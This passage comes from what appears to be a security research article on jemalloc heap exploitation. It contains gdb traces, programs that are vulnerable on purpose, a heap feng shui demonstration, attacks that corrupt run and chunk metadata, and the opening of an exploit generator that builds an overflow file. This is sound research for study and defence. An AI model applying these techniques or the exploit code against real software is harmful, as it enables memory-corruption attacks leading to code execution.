0xb7c01030: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7c01040: 0x080489e0  0x00000000  0x00000000  0x00000000
0xb7c01050: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7c01060: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7c01070: 0x080489f0  0x00000000  0x00000000  0x00000000
0xb7c01080: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7c01090: 0x00000000  0x00000000  0x00000000  0x00000000


Our run is at 0xb7c01000 and the bin is bin[5] which handles regions of
size 0x30 (48 in decimal). Since our objects are of size 36 bytes they
don't fit in the previous bin, i.e. bin[4], of size 0x20 (32). We can see
'obj_a' at 0xb7c01040 with its VPTR (0x080489e0) and 'obj_b' at 0xb7c01070
with its own VPTR (0x080489f0).

Our next breakpoint is after the overflow of 'obj_a' into 'obj_b' and just
before the first call of 'print()'. Our run now looks like the following:


gdb $ x/40x 0xb7c01000
0xb7c01000: 0xb7fd315c  0x00000000  0x00000052  0xfffffffc
0xb7c01010: 0xffffffff  0x000fffff  0x00000000  0x00000000
0xb7c01020: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7c01030: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7c01040: 0x080489e0  0x41414141  0x41414141  0x41414141
0xb7c01050: 0x41414141  0x41414141  0x41414141  0x41414141
0xb7c01060: 0x41414141  0x41414141  0x41414141  0x41414141
0xb7c01070: 0x41414141  0x42424242  0x42424242  0x00004242
0xb7c01080: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7c01090: 0x00000000  0x00000000  0x00000000  0x00000000
gdb $ x/i $eip
0x80486d1 <main(int, char**)+177>:   call   *(%eax)
gdb $ print $eax
$15 = 0x80489e0


At 0x080486d1 is the call of 'print()' of 'obj_a'. At 0xb7c01070 we can see
that we have overwritten the VPTR of 'obj_b' that was in an adjacent region
to 'obj_a'. Finally, at the call of 'print()' by 'obj_b':


gdb $ x/i $eip
=> 0x80486d8 <main(int, char**)+184>:   call   *(%eax)
gdb $ print $eax
$16 = 0x41414141


----[ 3.2 - Heap manipulation

In order to be able to arrange the jemalloc heap in a predictable state we
need to understand the allocator's behavior and use heap manipulation
tactics to influence it to our advantage. In the context of browsers, heap
manipulation tactics are usually referred to as 'Heap Feng Shui' after
Alexander Sotirov's work [FENG].

By 'predictable state' we mean that the heap must be arranged as reliably
as possible in a way that we can position data where we want. This enables
us to use the tactic of corrupting adjacent regions of the previous
paragraph, but also to exploit use-after-free bugs. In use-after-free
bugs a memory region is allocated, used, freed and then used again due
to a bug. In such a case if we know the region's size we can manipulate
the heap to place data of our own choosing in the freed region's memory
slot on its run before it is used again. Upon its subsequent incorrect use
the region now has our data that can help us hijack the flow of execution.

To explore jemalloc's behavior and manipulate it into a predictable
state we use an algorithm similar to the one presented in [HOEJ]. Since
in the general case we cannot know beforehand the state of the runs of
the class size we are interested in, we perform many allocations of this
size hoping to cover the holes (i.e. free regions) in the existing runs
and get a fresh run. Hopefully the next series of allocations we will
perform will be on this fresh run and therefore will be sequential. As
we have seen, sequential allocations on a largely empty run are also
contiguous. Next, we perform such a series of allocations controlled by
us. In the case we are trying to use the adjacent regions corruption
tactic, these allocations are of the victim object/structure we have
chosen to help us gain code execution when corrupted.

The following step is to deallocate every second region in this last series
of controlled victim allocations. This will create holes in between the
victim objects/structures on the run of the size class we are trying to
manipulate. Finally, we trigger the heap overflow bug forcing, due to the
state we have arranged, jemalloc to place the vulnerable objects in holes 
on the target run overflowing into the victim objects.

Let's demonstrate the above discussion with an example (file test-holes.c
in the code archive):


#define TSIZE   0x10            /* target size class */
#define NALLOC  500             /* number of allocations */
#define NFREE   (NALLOC / 10)   /* number of deallocations */

char *foo[NALLOC];
char *bar[NALLOC];

printf("step 1: controlled allocations of victim objects\n");

for(i = 0; i < NALLOC; i++)
{
    foo[i] = malloc(TSIZE);
    printf("foo[%d]:\t\t0x%x\n", i, (unsigned int)foo[i]);
}

printf("step 2: creating holes in between the victim objects\n");

for(i = (NALLOC - NFREE); i < NALLOC; i += 2)
{
    printf("freeing foo[%d]:\t0x%x\n", i, (unsigned int)foo[i]);
    free(foo[i]);
}

printf("step 3: fill holes with vulnerable objects\n");

for(i = (NALLOC - NFREE + 1); i < NALLOC; i += 2)
{
    bar[i] = malloc(TSIZE);
    printf("bar[%d]:\t0x%x\n", i, (unsigned int)bar[i]);
}


jemalloc's behavior can be observed in the output, remember that our target
size class is 16 bytes:


$ ./test-holes
step 1: controlled allocations of victim objects
foo[0]:             0x40201030
foo[1]:             0x40201040
foo[2]:             0x40201050
foo[3]:             0x40201060
foo[4]:             0x40201070
foo[5]:             0x40201080
foo[6]:             0x40201090
foo[7]:             0x402010a0

...

foo[447]:           0x40202c50
foo[448]:           0x40202c60
foo[449]:           0x40202c70
foo[450]:           0x40202c80
foo[451]:           0x40202c90
foo[452]:           0x40202ca0
foo[453]:           0x40202cb0
foo[454]:           0x40202cc0
foo[455]:           0x40202cd0
foo[456]:           0x40202ce0
foo[457]:           0x40202cf0
foo[458]:           0x40202d00
foo[459]:           0x40202d10
foo[460]:           0x40202d20

...

step 2: creating holes in between the victim objects
freeing foo[450]:   0x40202c80
freeing foo[452]:   0x40202ca0
freeing foo[454]:   0x40202cc0
freeing foo[456]:   0x40202ce0
freeing foo[458]:   0x40202d00
freeing foo[460]:   0x40202d20
freeing foo[462]:   0x40202d40
freeing foo[464]:   0x40202d60
freeing foo[466]:   0x40202d80
freeing foo[468]:   0x40202da0
freeing foo[470]:   0x40202dc0
freeing foo[472]:   0x40202de0
freeing foo[474]:   0x40202e00
freeing foo[476]:   0x40202e20
freeing foo[478]:   0x40202e40
freeing foo[480]:   0x40202e60
freeing foo[482]:   0x40202e80
freeing foo[484]:   0x40202ea0
freeing foo[486]:   0x40202ec0
freeing foo[488]:   0x40202ee0
freeing foo[490]:   0x40202f00
freeing foo[492]:   0x40202f20
freeing foo[494]:   0x40202f40
freeing foo[496]:   0x40202f60
freeing foo[498]:   0x40202f80

step 3: fill holes with vulnerable objects
bar[451]:           0x40202c80
bar[453]:           0x40202ca0
bar[455]:           0x40202cc0
bar[457]:           0x40202ce0
bar[459]:           0x40202d00
bar[461]:           0x40202d20
bar[463]:           0x40202d40
bar[465]:           0x40202d60
bar[467]:           0x40202d80
bar[469]:           0x40202da0
bar[471]:           0x40202dc0
bar[473]:           0x40202de0
bar[475]:           0x40202e00
bar[477]:           0x40202e20
bar[479]:           0x40202e40
bar[481]:           0x40202e60
bar[483]:           0x40202e80
bar[485]:           0x40202ea0
bar[487]:           0x40202ec0
bar[489]:           0x40202ee0
bar[491]:           0x40202f00
bar[493]:           0x40202f20
bar[495]:           0x40202f40
bar[497]:           0x40202f60
bar[499]:           0x40202f80


We can see that jemalloc works in a FIFO way; the first region freed is the
first returned for a subsequent allocation request. Although our example
mainly demonstrates how to manipulate the jemalloc heap to exploit adjacent
region corruptions, our observations can also help us to exploit
use-after-free vulnerabilities. When our goal is to get data of our own
choosing in the same region as a freed region about to be used, jemalloc's
FIFO behavior can he help us place our data in a predictable way.

In the above discussion we have implicitly assumed that we can make
arbitrary allocations and deallocations; i.e. that we have available in
our exploitation tool belt allocation and deallocation primitives for
our target size. Depending on the vulnerable application (that relies
on jemalloc) this may or may not be straightforward. For example, if
our target is a media player we may be able to control allocations by
introducing an arbitrary number of metadata tags in the input file. In
the case of Firefox we can of course use Javascript to implement our
heap primitives.  But that's the topic of another paper.


----[ 3.3 - Metadata corruption

The final heap corruption primitive we will focus on is the corruption of
metadata. We will once again remind you that since jemalloc is not based
on freelists (it uses macro-based red black trees instead), unlink and
frontlink exploitation techniques are not usable. We will instead pay
attention on how we can force 'malloc()' return a pointer that points
to already initialized heap regions.


------[ 3.3.1 - Run (arena_run_t)

We have already defined what a 'run' is in section 2.1.3. We will briefly
remind the reader that a 'run' is just a collection of memory regions of
equal size that starts with some metadata describing it. Recall that runs
are always aligned to a multiple of the page size (0x1000 in most real
life applications). The run metadata obey the layout shown in [2-3].

For release builds the 'magic' field will not be present (that is,
MALLOC_DEBUG is off by default). As we have already mentioned, each
run contains a pointer to the bin whose regions it contains. The 'bin'
pointer is read and dereferenced from 'arena_run_t' (see [2-3]) only
during deallocation. On deallocation the region size is unknown, thus the
bin index cannot be computed directly, instead, jemalloc will first find
the run the memory to be freed is located and will then dereference the
bin pointer stored in the run's header. From function 'arena_dalloc_small':


arena_dalloc_small(arena_t *arena, arena_chunk_t *chunk, void *ptr,
        arena_chunk_map_t *mapelm)
{
    arena_run_t *run;
    arena_bin_t *bin;
    size_t size;

    run = (arena_run_t *)(mapelm->bits & ~pagesize_mask);
    bin = run->bin;
    size = bin->reg_size;


On the other hand, during the allocation process, once the appropriate run
is located, its 'regs_mask[]' bit vector is examined in search of a free
region. Note that the search for a free region starts at
'regs_mask[regs_minelm]' ('regs_minlem' holds the index of the first
'regs_mask[]' element that has nonzero bits). We will exploit this fact to
force 'malloc()' return an already allocated region.

In a heap overflow situation it is pretty common for the attacker to be
able to overflow a memory region which is not followed by other regions
(like the wilderness chunk in dlmalloc, but in jemalloc such regions are
not that special). In such a situation, the attacker will most likely be
able to overwrite the run header of the next run. Since runs hold memory
regions of equal size, the next page aligned address will either be a
normal page of the current run, or will contain the metadata (header) of
the next run which will hold regions of different size (larger or smaller,
it doesn't really matter). In the first case, overwriting adjacent regions
of the same run is possible and thus an attacker can use the techniques
that were previously discussed in 3.1. The latter case is the subject of
the following paragraphs.

People already familiar with heap exploitation, may recall that it is
pretty common for an attacker to control the last heap item (region in our
case) allocated, that is the most recently allocated region is the one
being overflown. Because of the importance of this situation, we believe
it is essential to have a look at how we can leverage it to gain control
of the target process.

Let's first have a look at how the in-memory model of a run looks like
(file test-run.c):


char *first;

first = (char *)malloc(16);
printf("first = %p\n", first);
memset(first, 'A', 16);

breakpoint();

free(first);


The test program is compiled and a debugging build of jemalloc is loaded
to be used with gdb.


~$ gcc -g -Wall test-run.c -o test-run
~$ export LD_PRELOAD=/usr/src/lib/libc/libc.so.7
~$ gdb test-run
GNU gdb 6.1.1 [FreeBSD]
...
(gdb) run
...
first = 0x28201030

Program received signal SIGTRAP, Trace/breakpoint trap.
main () at simple.c:14
14        free(first);


The call to malloc() returns the address 0x28201030 which belongs to the
run at 0x28201000.


(gdb) print *(arena_run_t *)0x28201000
$1 = {bin = 0x8049838, regs_minelm = 0, nfree = 252,
  regs_mask = {4294967294}}
(gdb) print *(arena_bin_t *)0x8049838
$2 = {runcur = 0x28201000, runs = {...}, reg_size = 16, run_size = 4096,
  nregs = 253, regs_mask_nelms = 8, reg0_offset = 48}


Oki doki, run 0x28201000 services the requests for memory regions of size
16 as indicated by the 'reg_size' value of the bin pointer stored in the
run header (notice that run->bin->runcur == run).

Now let's proceed with studying a scenario that can lead to 'malloc()'
exploitation. For our example let's assume that the attacker controls
a memory region 'A' which is the last in its run.


[run #1 header][RR...RA][run #2 header][RR...]


In the simple diagram shown above, 'R' stands for a normal region which may
or may not be allocated while 'A' corresponds to the region that belongs to
the attacker, i.e. it is the one that will be overflown. 'A' does not
strictly need to be the last region of run #1. It can also be any region of
the run. Let's explore how from a region on run #1 we can reach the
metadata of run #2 (file test-runhdr.c, also see [2-6]):


unsigned char code[] = "\x61\x62\x63\x64";

one = malloc(0x10);
memset(one, 0x41, 0x10);
printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one);

two = malloc(0x10);
memset(two, 0x42, 0x10);
printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two);

three = malloc(0x20);
memset(three, 0x43, 0x20);
printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three);

__asm__("int3");

printf("[+] corrupting the metadata of region three's run\n");
memcpy(two + 4032, code, 4);

__asm__("int3");


At the first breakpoint we can see that for size 16 the run is at
0xb7d01000 and for size 32 the run is at 0xb7d02000:


gdb $ r
[Thread debugging using libthread_db enabled]
[+] region one:     0xb7d01030: AAAAAAAAAAAAAAAA
[+] region two:     0xb7d01040: BBBBBBBBBBBBBBBB
[+] region three:   0xb7d02020: CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

Program received signal SIGTRAP, Trace/breakpoint trap.

gdb $ print arenas[0].bins[3].runcur
$5 = (arena_run_t *) 0xb7d01000
gdb $ print arenas[0].bins[4].runcur
$6 = (arena_run_t *) 0xb7d02000


The metadata of run 0xb7d02000 are:


gdb $ x/30x 0xb7d02000
0xb7d02000: 0xb7fd3134  0x00000000  0x0000007e  0xfffffffe
0xb7d02010: 0xffffffff  0xffffffff  0x7fffffff  0x00000000
0xb7d02020: 0x43434343  0x43434343  0x43434343  0x43434343
0xb7d02030: 0x43434343  0x43434343  0x43434343  0x43434343
0xb7d02040: 0x00000000  0x00000000  0x00000000  0x00000000


After the memcpy() and at the second breakpoint:


gdb $ x/30x 0xb7d02000
0xb7d02000: 0x64636261  0x00000000  0x0000007e  0xfffffffe
0xb7d02010: 0xffffffff  0xffffffff  0x7fffffff  0x00000000
0xb7d02020: 0x43434343  0x43434343  0x43434343  0x43434343
0xb7d02030: 0x43434343  0x43434343  0x43434343  0x43434343
0xb7d02040: 0x00000000  0x00000000  0x00000000  0x00000000


We can see that the run's metadata and specifically the address of the
'bin' element (see [2-3]) has been overwritten. One way or the other, the
attacker will be able to alter the contents of run #2's header, but once
this has happened, what's the potential of achieving code execution?

A careful reader would have already thought the obvious; one can overwrite
the 'bin' pointer to make it point to a fake bin structure of his own.
Well, this is not a good idea because of two reasons. First, the attacker
needs further control of the target process in order to successfully
construct a fake bin header somewhere in memory. Secondly, and most
importantly, as it has already been discussed, the 'bin' pointer of a
region's run header is dereferenced only during deallocation. A careful
study of the jemalloc source code reveals that only 'run->bin->reg0_offset'
is actually used (somewhere in 'arena_run_reg_dalloc()'), thus, from an
attacker's point of view, the bin pointer is not that interesting
('reg0_offset' overwrite may cause further problems as well leading to
crashes and a forced interrupt of our exploit).

Our attack consists of the following steps. The attacker overflows
'A' and overwrites run #2's header. Then, upon the next malloc() of
a size equal to the size serviced by run #2, the user will get as a
result a pointer to a memory region of the previous run (run #1 in our
example). It is important to understand that in order for the attack to
work, the overflown run should serve regions that belong to any of the
available bins. Let's further examine our case (file vuln-run.c):


char *one, *two, *three, *four, *temp;
char offset[sizeof(size_t)];
int i;

if(argc < 2)
{
    printf("%s <offset>\n", argv[0]);
    return 0;
}

/* User supplied value for 'regs_minelm'. */
*(size_t *)&offset[0] = (size_t)atol(argv[1]);

printf("Allocating a chunk of 16 bytes just for fun\n");
one = (char *)malloc(16);
printf("one = %p\n", one);

/* All those allocations will fall inside the same run. */
printf("Allocating first chunk of 32 bytes\n");
two = (char *)malloc(32);
printf("two = %p\n", two);

printf("Performing more 32 byte allocations\n");
for(i = 0; i < 10; i++)
{
    temp = (char *)malloc(32);
    printf("temp = %p\n", temp);
}

/* This will allocate a new run for size 64. */
printf("Setting up a run for the next size class\n");
three = (char *)malloc(64);
printf("three = %p\n", three);

/* Overwrite 'regs_minelm' of the next run. */
breakpoint();
memcpy(two + 4064 + 4, offset, 4);
breakpoint();

printf("Next chunk should point in the previous run\n");
four = (char *)malloc(64);
printf("four = %p\n", four);


vuln-run.c requires the user to supply a value to be written on
'regs_minelm' of the next run. To achieve reliable results we have to
somehow control the memory contents at 'regs_mask[regs_minelm]' as well.
By taking a closer look at the layout of 'arena_run_t', we can see that by
supplying the value -2 for 'regs_minelm', we can force
'regs_mask[regs_minelm]' to point to 'regs_minelm' itself. That is,
'regs_minelm[-2] = -2' :)

Well, depending on the target application, other values may also be
applicable but -2 is a safe one that does not cause further problems in the
internals of jemalloc and avoids forced crashes.

From function 'arena_run_reg_alloc':


static inline void *
arena_run_reg_alloc(arena_run_t *run, arena_bin_t *bin)
{
	void *ret;
	unsigned i, mask, bit, regind;

	...

	i = run->regs_minelm;
	mask = run->regs_mask[i]; /* [3-4] */
	if (mask != 0) {
		/* Usable allocation found. */
		bit = ffs((int)mask) - 1; /* [3-5] */

		regind = ((i << (SIZEOF_INT_2POW + 3)) + bit); /* [3-6] */
		...
		ret = (void *)(((uintptr_t)run) + bin->reg0_offset
		    + (bin->reg_size * regind)); /* [3-7] */

		...
		return (ret);
	}

	...
}


Initially, 'i' gets the value of 'run->regs_minelm' which is equal to -2.
On the assignment at [3-4], 'mask' receives the value 'regs_mask[-2]' which
happens to be the value of 'regs_minelm', that is -2. The binary
representation of -2 is 0xfffffffe thus 'ffs()' (man ffs(3) for those who
haven't used 'ffs()' before) will return 2, so, 'bit' will equal 1. As if
it wasn't fucking tiring so far, at [3-6], 'regind' is computed as
'((0xfffffffe << 5) + 1)' which equals 0xffffffc1 or -63. Now do the maths,
for 'reg_size' values belonging to small-medium sized regions, the formula
at [3-7] calculates 'ret' in such a way that 'ret' receives a pointer to a
memory region 63 chunks backwards :)

Now it's time for some hands on practice:


~$ gdb ./vuln-run
GNU gdb 6.1.1 [FreeBSD]
...
(gdb) run -2
Starting program: vuln-run -2
Allocating a chunk of 16 bytes just for fun
one = 0x28202030
Allocating first chunk of 32 bytes
two = 0x28203020
Performing more 32 byte allocations
...
temp = 0x28203080
...
Setting up a run for the next size class
three = 0x28204040

Program received signal SIGTRAP, Trace/breakpoint trap.
main (argc=Error accessing memory address 0x0: Bad address.
) at vuln-run.c:35
35        memcpy(two + 4064 + 4, offset, 4);
(gdb) c
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
main (argc=Error accessing memory address 0x0: Bad address.
) at vuln-run.c:38
38        printf("Next chunk should point in the previous run\n");
(gdb) c
Continuing.
Next chunk should point in the previous run
four = 0x28203080

Program exited normally.
(gdb) q


Notice how the memory region numbered 'four' (64 bytes) points exactly
where the chunk named 'temp' (32 bytes) starts. Voila :)


------[ 3.3.2 - Chunk (arena_chunk_t)

In the previous section we described the potential of achieving arbitrary
code execution by overwriting the run header metadata. Trying to cover
all the possibilities, we will now focus on what the attacker can do
once she is able to corrupt the chunk header of an arena. Although
the probability of directly affecting a nearby arena is low, a memory
leak or the indirect control of the heap layout by continuous bin-sized
allocations can render the technique described in this section a useful
tool in the attacker's hand.

Before continuing with our analysis, let's set the foundations of the
test case we will cover.

[[Arena #1 header][R...R][C...C]]

As we have already mentioned in the previous sections, new arena chunks
are created at will depending on whether the current arena is full
(that is, jemalloc is unable to find a non-full run to service the
current allocation) or whether the target application runs on multiple
threads. Thus a good way to force the initialization of a new arena chunk
is to continuously force the target application to perform allocations,
preferably bin-sized ones. In the figure above, letter 'R' indicates the
presence of memory regions that are already allocated while 'C' denotes
regions that may be free. By continuously requesting memory regions,
the available arena regions may be depleted forcing jemalloc to allocate
a new arena (what is, in fact, allocated is a new chunk called an arena
chunk, by calling 'arena_chunk_alloc()' which usually calls 'mmap()').

The low level function responsible for allocating memory pages (called
'pages_map()'), is used by 'chunk_alloc_mmap()' in a way that makes it
possible for several distinct arenas (and any possible arena extensions)
to be physically adjacent. So, once the attacker requests a bunch of
new allocations, the memory layout may resemble the following figure.

[[Arena #1 header][R...R][C...C]][[Arena #2 header][...]]

It is now obvious that overflowing the last chunk of arena #1 will
result in the arena chunk header of arena #2 getting overwritten. It is
thus interesting to take a look at how one can take advantage of such
a situation.

The following code is one of those typical vulnerable-on-purpose programs
you usually come across in Phrack articles ;) The scenario we will be
analyzing in this section is the following: The attacker forces the
target application to allocate a new arena by controlling the heap
allocations. She then triggers the overflow in the last region of the
previous arena (the region that physically borders the new arena) thus
corrupting the chunk header metadata (see [2-5] on the diagram). When the
application calls 'free()' on any region of the newly allocated arena,
the jemalloc housekeeping information is altered. On the next call to
'malloc()', the allocator will return a region that points to already
allocated space of (preferably) the previous arena. Take your time
to carefully study the following snippet since it is essential for
understanding this attack (full code in vuln-chunk.c):


char *base1, *base2;
char *p1, *p2, *p3, *last, *first;
char buffer[1024];
int fd, l;

p1 = (char *)malloc(16);
base1 = (char *)CHUNK_ADDR2BASE(p1);
print_arena_chunk(base1);

/* [3-8] */

/* Simulate the fact that we somehow control heap allocations.
 * This will consume the first chunk, and will force jemalloc
 * to allocate a new chunk for this arena.
 */
last = NULL;

while((base2 = (char *)CHUNK_ADDR2BASE((first = malloc(16)))) == base1)
    last = first;

print_arena_chunk(base2);

/* [3-9] */

/* Allocate one more region right after the first region of the
 * new chunk. This is done for demonstration purposes only.
 */
p2 = malloc(16);

/* This is how the chunks look like at this point:
 *
 *   [HAAAA....L][HFPUUUU....U]
 *
 * H: Chunk header
 * A: Allocated regions
 * L: The chunk pointed to by 'last'
 * F: The chunk pointed to by 'first'
 * P: The chunk pointed to by 'p2'
 * U: Unallocated space
 */
fprintf(stderr, "base1: %p vs. base2: %p (+%d)\n",
    base1, base2, (ptrdiff_t)(base2 - base1));

fprintf(stderr, "p1: %p vs. p2: %p (+%d)\n",
    p1, p2, (ptrdiff_t)(p2 - p1));

/* [3-10] */

if(argc > 1) {
    if((fd = open(argv[1], O_RDONLY)) > 0) {
        /* Read the contents of the given file. We assume this file
         * contains the exploitation vector.
         */
        memset(buffer, 0, sizeof(buffer));
        l = read(fd, buffer, sizeof(buffer));
        close(fd);

        /* Copy data in the last chunk of the previous arena chunk. */
        fprintf(stderr, "Read %d bytes\n", l);
        memcpy(last, buffer, l);
    }
}

/* [3-11] */

/* Trigger the bug by free()ing any chunk in the new arena. We
 * can achieve the same results by deallocating 'first'.
 */
free(p2);
print_region(first, 16);

/* [3-12] */

/* Now 'p3' will point to an already allocated region (in this
 * example, 'p3' will overwhelm 'first').
 */
p3 = malloc(4096);

/* [3-13] */

fprintf(stderr, "p3 = %p\n", p3);
memset(p3, 'A', 4096);

/* 'A's should appear in 'first' which was previously zeroed. */
print_region(first, 16);
return 0;


Before going further, the reader is advised to read the comments and the
code above very carefully. You can safely ignore 'print_arena_chunk()'
and 'print_region()', they are defined in the file lib.h found in the code
archive and are used for debugging purposes only. The snippet is actually
split in 6 parts which can be distinguished by their corresponding '[3-x]'
tags. Briefly, in part [3-8], the vulnerable program performs a number
of allocations in order to fill up the available space served by the
first arena. This emulates the fact that an attacker somehow controls
the order of allocations and deallocations on the target, a fair and
very common prerequisite. Additionally, the last call to 'malloc()'
(the one before the while loop breaks) forces jemalloc to allocate a new
arena chunk and return the first available memory region. Part [3-9],
performs one more allocation, one that will lie next to the first (that
is the second region of the new arena). This final allocation is there
for demonstration purposes only (check the comments for more details).

Part [3-10] is where the actual overflow takes place and part [3-11]
calls 'free()' on one of the regions of the newly allocated arena. Before
explaining the rest of the vulnerable code, let's see what's going on when
'free()' gets called on a memory region.


void
free(void *ptr)
{
  ...
  if (ptr != NULL) {
    ...
    idalloc(ptr);
  }
}

static inline void
idalloc(void *ptr)
{
  ...
  chunk = (arena_chunk_t *)CHUNK_ADDR2BASE(ptr); /* [3-14] */
  if (chunk != ptr)
    arena_dalloc(chunk->arena, chunk, ptr); /* [3-15] */
  else
    huge_dalloc(ptr);
}


The 'CHUNK_ADDR2BASE()' macro at [3-14] returns the pointer to the chunk
that the given memory region belongs to. In fact, what it does is just
a simple pointer trick to get the first address before 'ptr' that is
aligned to a multiple of a chunk size (1 or 2 MB by default, depending
on the jemalloc flavor used). If this chunk does not belong to a, so
called, huge allocation, then the allocator knows that it definitely
belongs to an arena. As previously stated, an arena chunk begins with
a special header, called 'arena_chunk_t', which, as expected, contains
a pointer to the arena that this chunk is part of.

Now recall that in part [3-10] of the vulnerable snippet presented
above, the attacker is able to overwrite the first few bytes of the next
arena chunk. Consequently, the 'chunk->arena' pointer that points to
the arena is under the attacker's control. From now on, the reader may
safely assume that all functions called by 'arena_dalloc()' at [3-15]
may receive an arbitrary value for the arena pointer:


static inline void
arena_dalloc(arena_t *arena, arena_chunk_t *chunk, void *ptr)
{
  size_t pageind;
  arena_chunk_map_t *mapelm;
  ...

  pageind = (((uintptr_t)ptr - (uintptr_t)chunk) >> PAGE_SHIFT);
  mapelm = &chunk->map[pageind];
  ...

  if ((mapelm->bits & CHUNK_MAP_LARGE) == 0) {
    /* Small allocation. */
    malloc_spin_lock(&arena->lock);
    arena_dalloc_small(arena, chunk, ptr, mapelm);  /* [3-16] */
    malloc_spin_unlock(&arena->lock);
  }
  else
    arena_dalloc_large(arena, chunk, ptr); /* [3-17] */
}


Entering 'arena_dalloc()', one can see that the 'arena' pointer
is not used a lot, it's just passed to 'arena_dalloc_small()'
or 'arena_dalloc_large()' depending on the size class of the
memory region being deallocated. It is interesting to note that the
aforementioned size class is determined by inspecting 'mapelm->bits'
which, hopefully, is under the influence of the attacker. Following
the path taken by 'arena_dalloc_small()' results in many complications
that will most probably ruin our attack (hint for the interested
reader - pointer arithmetics performed by 'arena_run_reg_dalloc()'
are kinda dangerous). For this purpose, we choose to follow function
'arena_dalloc_large()':


static void
arena_dalloc_large(arena_t *arena, arena_chunk_t *chunk, void *ptr)
{
  malloc_spin_lock(&arena->lock);
  ...

  size_t pageind = ((uintptr_t)ptr - (uintptr_t)chunk) >>
    PAGE_SHIFT; /* [3-18] */
  size_t size = chunk->map[pageind].bits & ~PAGE_MASK; /* [3-19] */

  ...
  arena_run_dalloc(arena, (arena_run_t *)ptr, true);
  malloc_spin_unlock(&arena->lock);
}


There are two important things to notice in the snippet above. The first
thing to note is the way 'pageind' is calculated. Variable 'ptr' points
to the start of the memory region to be free()'ed while 'chunk' is the
address of the corresponding arena chunk. For a chunk that starts at
e.g. 0x28200000, the first region to be given out to the user may start
at 0x28201030 mainly because of the overhead involving the metadata of
chunk, arena and run headers as well as their bitmaps. A careful reader
may notice that 0x28201030 is more than a page far from the start
of the chunk, so, 'pageind' is larger or equal to 1. It is for this
purpose that we are mostly interested in overwriting 'chunk->map[1]'
and not 'chunk->map[0]'. The second thing to catch our attention is
the fact that, at [3-19], 'size' is calculated directly from the 'bits'
element of the overwritten bitmap. This size is later converted to the
number of pages comprising it, so, the attacker can directly affect the
number of pages to be marked as free. Let's see 'arena_run_dalloc':


static void
arena_run_dalloc(arena_t *arena, arena_run_t *run, bool dirty)
{
  arena_chunk_t *chunk;
  size_t size, run_ind, run_pages;

  chunk = (arena_chunk_t *)CHUNK_ADDR2BASE(run);
  run_ind = (size_t)(((uintptr_t)run - (uintptr_t)chunk)
      >> PAGE_SHIFT);
  ...

  if ((chunk->map[run_ind].bits & CHUNK_MAP_LARGE) != 0)
    size = chunk->map[run_ind].bits & ~PAGE_MASK;
  else
    ...
  run_pages = (size >> PAGE_SHIFT); /* [3-20] */

  /* Mark pages as unallocated in the chunk map. */
  if (dirty) {
    size_t i;

    for (i = 0; i < run_pages; i++) {
      ...
      /* [3-21] */
      chunk->map[run_ind + i].bits = CHUNK_MAP_DIRTY;
    }

    ...
    chunk->ndirty += run_pages;
    arena->ndirty += run_pages;
  }
  else {
    ...
  }
  chunk->map[run_ind].bits = size | (chunk->map[run_ind].bits &
      PAGE_MASK);
  chunk->map[run_ind+run_pages-1].bits = size |
      (chunk->map[run_ind+run_pages-1].bits & PAGE_MASK);


  /* Page coalescing code - Not relevant for _this_ example. */
  ...

  /* Insert into runs_avail, now that coalescing is complete. */
  /* [3-22] */
  arena_avail_tree_insert(&arena->runs_avail, &chunk->map[run_ind]);

  ...
}


Continuing with our analysis, one can see that at [3-20] the same
size that was calculated in 'arena_dalloc_large()' is now converted
to a number of pages and then all 'map[]' elements that correspond to
these pages are marked as dirty (notice that 'dirty' argument given
to 'arena_run_dalloc()' by 'arena_dalloc_large()' is always set to
true). The rest of the 'arena_run_dalloc()' code, which is not shown
here, is responsible for forward and backward coalescing of dirty
pages. Although not directly relevant for our demonstration, it's
something that an attacker should keep in mind while developing a real
life reliable exploit.

Last but not least, it's interesting to note that, since the attacker
controls the 'arena' pointer, the map elements that correspond to the
freed pages are inserted in the given arena's red black tree. This can be
seen at [3-22] where 'arena_avail_tree_insert()' is actually called. One
may think that since red-black trees are involved in jemalloc, she can
abuse their pointer arithmetics to achieve a '4bytes anywhere' write
primitive. We urge all interested readers to have a look at rb.h, the
file that contains the macro-based red black tree implementation used
by jemalloc (WARNING: don't try this while sober).

Summing up, our attack algorithm consists of the following steps:

1) Force the target application to perform a number of allocations until a
new arena is eventually allocated or until a neighboring arena is reached
(call it arena B). This is mostly meaningful for our demonstration codes,
since, in real life applications chances are that more than one chunks
and/or arenas will be already available during the exploitation process.

2) Overwrite the 'arena' pointer of arena B's chunk and make it point
to an already existing arena. The address of the very first arena of
a process (call it arena A) is always fixed since it's declared as
static. This will prevent the allocator from accessing a bad address
and eventually segfaulting.

3) Force or let the target application free() any chunk that belongs to
arena B. We can deallocate any number of pages as long as they are marked
as allocated in the jemalloc metadata. Trying to free an unallocated page
will result in the red-black tree implementation of jemalloc entering
an endless loop or, rarely, segfaulting.

4) The next allocation to be served by arena B, will return a pointer
somewhere within the region that was erroneously free()'ed in step 3.

The exploit code for the vulnerable program presented in this section
can be seen below. It was coded on an x86 FreeBSD-8.2-RELEASE system, so
the offsets of the metadata may vary for your platform. Given the address
of an existing arena (arena A of step 2), it creates a file that contains
the exploitation vector. This file should be passed as argument to the
vulnerable target (full code in file exploit-chunk.c):


char buffer[1024], *p;
int fd;

if(argc != 2) {
    fprintf(stderr, "%s <arena>\n", argv[0]);
    return 0;
}

memset(buffer, 0, sizeof(buffer));

p = buffer;
strncpy(p, "1234567890123456", 16);
p += 16;

/* Arena address. */
*(size_t *)p = (size_t)strtoul(argv[1], NULL, 16);
p += sizeof(size_t);

/* Skip over rbtree metadata and 'chunk->map[0]'. */
strncpy(p,
    "AAAA" "AAAA" "CCCC"
    "AAAA" "AAAA" "AAAA" "GGGG" "HHHH" , 32);

p += 32;

*(size_t *)p = 0x00001002;
/*                      ^ CHUNK_MAP_LARGE                 */
/*                   ^ Number of pages to free (1 is ok). */
p += sizeof(size_t);

